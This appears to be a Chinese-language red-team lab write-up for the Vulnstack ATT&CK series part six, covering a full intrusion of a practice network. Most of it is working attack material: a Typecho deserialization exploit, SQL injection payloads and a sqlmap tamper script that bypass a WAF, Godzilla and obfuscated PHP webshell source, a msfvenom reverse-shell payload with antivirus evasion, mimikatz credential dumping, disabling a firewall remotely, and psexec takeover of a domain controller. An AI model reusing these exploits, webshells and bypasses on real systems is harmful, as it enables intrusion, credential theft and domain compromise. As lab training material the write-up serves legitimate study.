ATT&CK实战系列——红队实战(六)

一、环境配置

vlunstack是红日安全团队出品的一个实战环境,具体介绍请访问:http://vulnstack.qiyuanxuetang.net/vuln/detail/8/
ATT&CK实战系列——红队实战(六)_第1张图片
ATT&CK实战系列——红队实战(六)_第2张图片

emmm,我得吐槽一下这个靶场是我配置最久的靶场,主要是自己比较菜,研究了一下午得出结论,可能不太对劲大佬们勿喷
在这里插入图片描述
首先是WEB它有3个快照分别对应的是iis、weblogic、typechoCMS,至于网上大佬搞出来的bluecms v1.6 sp1没找到,呜呜呜呜
接着是linux就开放了一个22端口,服务嘛啥也没有,最后DC就没啥好说的

于是就有了我以下搭建思路
ATT&CK实战系列——红队实战(六)_第3张图片

V3.2
web\de1ay | 1qaz!QAZ1qaz!QAZ
de1ay\de2ay | 1qaz@WSX!QAZ2wsx

二、外网打点

出我的nmap开干对192.168.111.128 进行扫描

nmap -sV -p 192.168.111.128

在这里插入图片描述
有个80Apache网站服务和一个3306mysql数据库服务

通过目录扫描得出两个网站地址如下:

bluecms:http://192.168.111.128/bluecms_v1.6_sp1/index.php
Typechocms:http://192.168.111.128/build/index.php

Typechocms前台反序列化

这里就不复现了参考:https://www.cnblogs.com/zhaijiahui/p/7763804.html

exp:

<?php
class Typecho_Request
{
    private $_params = array('screenName'=>'eval(\'phpinfo();exit();\')');
    private $_filter = array('assert');
}
$payload1 = new Typecho_Request();
class Typecho_Feed
{
    private $_type = 'RSS 2.0';
    private $_items;
    public function __construct($x1)
    {
        $this->_items[] = array('author'=>$x1);
    }
}
$payload2 = new Typecho_Feed($payload1);
$exp['adapter'] = $payload2;
$exp['prefix'] = 'c1tas';
echo base64_encode(serialize($exp));
?>

用post提交数据
url:http://192.168.198.128/Typecho1.0/install.php?finish=
Postdata:__typecho_config=前面脚本生成的
Referrer:http://192.168.198.128/Typecho1.0/

bluecms代码审计

直接快捷键 ctrl+shift+F
ATT&CK实战系列——红队实战(六)_第4张图片

接着我们定位变量进行代码审计
ATT&CK实战系列——红队实战(六)_第5张图片

分析得出这里接受一个get传参赋值给了变量$ad_id,如果满足正确的条件则执行sql语句:

$ad = $db->getone("SELECT * FROM ".table('ad')." WHERE ad_id =".$ad_id);

接着继续定位getone()这个自定义函数
ATT&CK实战系列——红队实战(六)_第6张图片
ATT&CK实战系列——红队实战(六)_第7张图片
ATT&CK实战系列——红队实战(六)_第8张图片

可以看到它自定义的一些操作数据库的函数,接着我们审计得出:

$ad = $db->getone("SELECT * FROM ".table('ad')." WHERE ad_id =".$ad_id);
ad_js.php?ad_id=1 //可控存在sql注入

ATT&CK实战系列——红队实战(六)_第9张图片

手工绕过某安全Dog

ATT&CK实战系列——红队实战(六)_第10张图片
这里可以参考雷石安全实验室的绕dog:https://mp.weixin.qq.com/s?__biz=MzI5MDE0MjQ1NQ==&mid=2247513167&idx=1&sn=55b126707592383d6460d9d7f3eef645&chksm=ec2695d7db511cc1224865b887fd479e5f39d561a041b2ed392e565a1440eb02319d6dfd38f4&mpshare=1&scene=23&srcid=1219H8ufKt6bkmS1Amjlf9pp&sharer_sharetime=1639929451746&sharer_shareid=cdcfacac1a78422ff14c9853c2dc0fef#rd

有waf那么fuzz下加上/"%!* 来干扰,绕过order by
ATT&CK实战系列——红队实战(六)_第11张图片

ad_js.php?ad_id=1/*§§*/order/*§§*/by/*§§*/6

ATT&CK实战系列——红队实战(六)_第12张图片
ATT&CK实战系列——红队实战(六)_第13张图片

ad_js.php?ad_id=-1/*%/*/union/*//*/select/*//*/1,2,3,4,5,6,7
URL编码
ad_js.php?ad_id=1/*%%2f*/order/*%2f%2f*/by/*%2f%2f*/7 //正常
ad_js.php?ad_id=1/*%%2f*/order/*%2f%2f*/by/*%2f%2f*/8 //错误

ATT&CK实战系列——红队实战(六)_第14张图片

绕过union select
内联注释是MySQL为了保持与其他数据兼容,将MySQL中特有的语句放在/!.../中,这些语句在不兼容的数据库中不执行,而在MySQL自身却能识别,执行。/*!50001*/ 在数据库版本大于5.00.00时中间的语句会被执行,此处的50001表示假如。

加上/!50001/ 跑一波

ATT&CK实战系列——红队实战(六)_第15张图片

ATT&CK实战系列——红队实战(六)_第16张图片

ad_js.php?ad_id=-1/*%/*/union/*//*//*!50440select*//*//*/1,2,3,4,5,6,7

ATT&CK实战系列——红队实战(六)_第17张图片
获取当前表:正常语句:

union select 1,2,3,4,5,6,group_concat(table_name) from information_schema.tables where table_schema=database()

套用上面的语句

ad_js.php?ad_id=-1/*%/*/union/*//*//*!50440select*//*//*/1,2,3,4,5,6,1,2,3,4,5,6,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()

发现不用database()就不会被拦截
ATT&CK实战系列——红队实战(六)_第18张图片
fuzz一下,%0A换行+注释

ad_js.php?ad_id=-1/*%/*/union/*//*//*!50440select*//*//*/1,2,3,4,5,6,group_concat(table_name) from information_schema.tables where table_schema=database(%0A /*!50440*/) //%0A换行+注释

ATT&CK实战系列——红队实战(六)_第19张图片
存在blue_admin表,查看该表下的字段

单引号过滤把blue_admin,hex编码下

ATT&CK实战系列——红队实战(六)_第20张图片

ad_js.php?ad_id=-1/*%/*/union/*//*//*!50440select*//*//*/1,2,3,4,5,6,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=0x626C75655F61646D696E

ATT&CK实战系列——红队实战(六)_第21张图片
存在admin_name,pwd、获取账密

账号
/ad_js.php?ad_id=-1/*%/*/union/*//*//*!50440select*//*//*/1,2,3,4,5,6,group_concat(admin_name)%20from%20blue_admin

ATT&CK实战系列——红队实战(六)_第22张图片

密码
/ad_js.php?ad_id=-1/*%/*/union/*//*//*!50440select*//*//*/1,2,3,4,5,6,group_concat(admin_name)%20from%20blue_admin

ATT&CK实战系列——红队实战(六)_第23张图片
接着MD5解出密码去登后台
ATT&CK实战系列——红队实战(六)_第24张图片

脚本绕过某安全Dog

github地址:https://github.com/pureqh/bypasswaf

脚本如下:

#!/usr/bin/env python
# -*- coding: utf-8 -*-

"""
Copyright (c) 2006-2019 sqlmap developers (http:%23 %26%23 %26sqlmap.org%23 %26)
See the file 'LICENSE' for copying permission
Author:pureqh.top
"""

import re
import os

from lib.core.data import kb
from lib.core.enums import PRIORITY
from lib.core.common import singleTimeWarnMessage
from lib.core.enums import DBMS
__priority__ = PRIORITY.LOW

def dependencies():
    singleTimeWarnMessage("Bypass safedog by pureqh'%s' only %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL))

def tamper(payload, **kwargs):

        payload=payload.replace(" ","  ",1)
        payload=payload.replace("ORDER BY","REGEXP \"[...%25%23]\"   /*!11444order %0a by*/")
        payload=payload.replace("union ALL SELECT","/*!11444union all%0a select*/")
        payload=payload.replace(" AND","/*!11444AND*/")
        payload=payload.replace("(SELECT (CASE","(/*!11444SELECT*/ %0a (CASE")
        payload=payload.replace("UNION SELECT","/*!11444union*/  /*REGEXP \"[...%25%23]\"*/  %0a select /*REGEXP \"[...%25%23]\"*/")
        payload=payload.replace("UNION ALL SELECT","REGEXP \"[...%0a%23]\" /*!11444union %0a select */ ")
        payload=payload.replace("()","(%0a /*!80000aaa*/)")
        payload=payload.replace(" AS","/*!11444AS*/")
        payload=payload.replace("FROM","/*!11444FROM*/")
        payload=payload.replace("INFORMATION_SCHEMA","/*like\"%0a%23\"*/ %0a  INFORMATION_SCHEMA")
        payload=payload.replace("INFORMATION_SCHEMA.TABLES","%0a /*!11444INFORMATION_SCHEMA.TABLES*/")
        
        return payload
python .\sqlmap.py -u "http://192.168.111.128/bluecms_v1.6_sp1/ad_js.php?ad_id=1*"  --tamper "safedog_sql_tamper.py" –random-agent  --dbms=mysql --level 5

ATT&CK实战系列——红队实战(六)_第25张图片
ATT&CK实战系列——红队实战(六)_第26张图片
ATT&CK实战系列——红队实战(六)_第27张图片

后台Getshell

ATT&CK实战系列——红队实战(六)_第28张图片
用账号admin、密码123456去登陆后台
ATT&CK实战系列——红队实战(六)_第29张图片
在模板管理处编辑抓包,尝试跨越目录去读取文件,结果能~
ATT&CK实战系列——红队实战(六)_第30张图片
那么放包之后修改文件就能getshell

哥斯拉shell
<?php
@session_start();
@set_time_limit(0);
@error_reporting(0);
function encode($D,$K){
    for($i=0;$i<strlen($D);$i++) {
        $c = $K[$i+1&15];
        $D[$i] = $D[$i]^$c;
    }
    return $D;
}
$pass='pass';
$payloadName='payload';
$key='3c6e0b8a9c15224a';
if (isset($_POST[$pass])){
    $data=encode(base64_decode($_POST[$pass]),$key);
    if (isset($_SESSION[$payloadName])){
        $payload=encode($_SESSION[$payloadName],$key);
        if (strpos($payload,"getBasicsInfo")===false){
            $payload=encode($payload,$key);
        }
		eval($payload);
        echo substr(md5($pass.$key),0,16);
        echo base64_encode(encode(@run($data),$key));
        echo substr(md5($pass.$key),16);
    }else{
        if (strpos($data,"getBasicsInfo")!==false){
            $_SESSION[$payloadName]=encode($data,$key);
        }
    }
}

ATT&CK实战系列——红队实战(六)_第31张图片
好家伙!!!哥斯拉的shell也给我拦截了

大佬的免杀shell
<?php 
    $a = strtr('azxcvt','zxcv','sser');
    @$a($_POST['password']);
?>

在连接蚁剑的时候,编码器不要用base64勾选chr或chr16
ATT&CK实战系列——红队实战(六)_第32张图片
ATT&CK实战系列——红队实战(六)_第33张图片
这里目标机器安装了某60执行命令就没有回显
ATT&CK实战系列——红队实战(六)_第34张图片

绕过某60安全

这里由于虚拟终端被拦截了,只好换成webshell去执行system命令
ATT&CK实战系列——红队实战(六)_第35张图片
ATT&CK实战系列——红队实战(六)_第36张图片
不得不说某60是真的强嗷
推荐一个项目:https://codeload.github.com/NyDubh3/CuiRi/zip/refs/tags/v1.0

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.159.129 LPORT=6666 -f c > /root/sheelcode.c

ATT&CK实战系列——红队实战(六)_第37张图片

 .\cuiri.exe -f .\msf.txt

ATT&CK实战系列——红队实战(六)_第38张图片
ATT&CK实战系列——红队实战(六)_第39张图片
生成完事之后直接上传到360进行执行
ATT&CK实战系列——红队实战(六)_第40张图片
在这里插入图片描述
ATT&CK实战系列——红队实战(六)_第41张图片
查看进程可以看到某60和safedog
ATT&CK实战系列——红队实战(六)_第42张图片
先迁移进程

getpid
migrate 2168

ATT&CK实战系列——红队实战(六)_第43张图片

三、内网渗透

msf传递shell给CS

CS建立监听器
ATT&CK实战系列——红队实战(六)_第44张图片

bg //退出保留会话
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set lhost 192.168.111.129 //注意这是CS的地址
set session 1
set lport 7777
run

ATT&CK实战系列——红队实战(六)_第45张图片ATT&CK实战系列——红队实战(六)_第46张图片
ATT&CK实战系列——红队实战(六)_第47张图片

ATT&CK实战系列——红队实战(六)_第48张图片

Run mimikatz

 logonpasswords

ATT&CK实战系列——红队实战(六)_第49张图片

 Username : de1ay
 Domain   : WEB
 Password : 1qaz!QAZ1qaz!QAZ

横向移动

通过网上大哥们的wp得到管理员密码好像是这个人傻了

Administrator
1qaz@WSX1qaz@WSX

上线域控DC

关闭防火墙后利用模块上线:

shell
net use \\10.10.10.10\ipc$ "1qaz@WSX1qaz@WSX" /user:"Administrator"
sc \\10.10.10.10 create unablefirewall binpath= "netsh advfirewall set allprofiles state off"  
sc \\10.10.10.10 start unablefirewall

抓取到域管理员的密码了,直接psexec登陆

exploit/windows/smb/psexec
set payload windows/meterpreter/bind_tcp
set rhost 10.10.10.10
set smbuser administrator
set smbpass 1qaz@WSX1qaz@WSX

ATT&CK实战系列——红队实战(六)_第50张图片
拿下域控
ATT&CK实战系列——红队实战(六)_第51张图片
ATT&CK实战系列——红队实战(六)_第52张图片

在这里插入图片描述

参考大佬们的博客:
https://www.erikten.cn/posts/f3c9f0b.html
https://mp.weixin.qq.com/s?__biz=Mzg2NDYwMDA1NA==&mid=2247495964&idx=6&sn=23d5a6c9f323c314c6b0ca0dfd8b54b8
https://blog.b1ank.top/posts/6e6989c7/

本文仅作靶场实战教程,禁止将本文演示的技术方法用于非法活动,违者后果自负。

你可能感兴趣的:(渗透测试,渗透测试,内网渗透,网络安全)